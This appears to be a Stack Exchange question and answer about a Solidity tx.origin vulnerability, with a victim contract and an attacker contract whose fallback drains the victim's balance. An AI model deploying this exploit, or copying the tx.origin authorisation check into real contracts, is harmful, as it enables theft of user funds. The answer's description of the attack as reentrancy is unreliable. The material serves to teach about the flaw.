# TxOriginVictim(msg.sender).transferTo(owner, msg.sender.balance): What is the purpose of Interface and what is TxOriginVictim(msg.sender)?

Tags: solidity, interfaces

I have two contracts in the context of tx.origin Vulnerability:

```
pragma solidity ^0.5.8;
contract TxOriginVictim {
   address owner;
   constructor() public{  
      owner = msg.sender;
   }
   function transferTo(address to, uint amount) public {  
      require(tx.origin == owner);  
      (bool success,) = to.call.value(amount)("");
      require(success);
   }
   function() external payable  {}
}
```

and the Attacker's contract:

==

```
pragma solidity ^0.5.8;
interface TxOriginVictim {  
   function transferTo(address to, uint amount) external;
}

contract TxOriginAttacker {
   address owner;
   constructor () public {  owner = msg.sender;}
   function getOwner() public returns (address) {  return owner;}
   function() external payable  {  
      TxOriginVictim(msg.sender).transferTo(owner, msg.sender.balance);
   }
}
```

In the TxOriginAttacker contract, I can’t  understand the purpose of TxOriginVictim’s interface. What is TxOriginVictim(msg.sender) in the statement:
TxOriginVictim(msg.sender).transferTo(owner, msg.sender.balance);

Please guide me.

Zulfi.

Answer (score 1, accepted):

Interfaces allows a contract to call another without knowing the implementation.

The code `TxOriginVictim(msg.sender).transferTo(owner, msg.sender.balance)` is doing something like.

```
TxOriginVictim victim = TxOriginVictim(msg.sender);
victim.transferTo(owner, msg.sender.balance);
```

The attacker assumes `msg.sender` is an instance of `TxOriginVictim` contract and tries to call `transferTo` function. A sort of reentrancy attack.

Since the victim only check `tx.origin` it is allowing the attacker to call `transferTo`.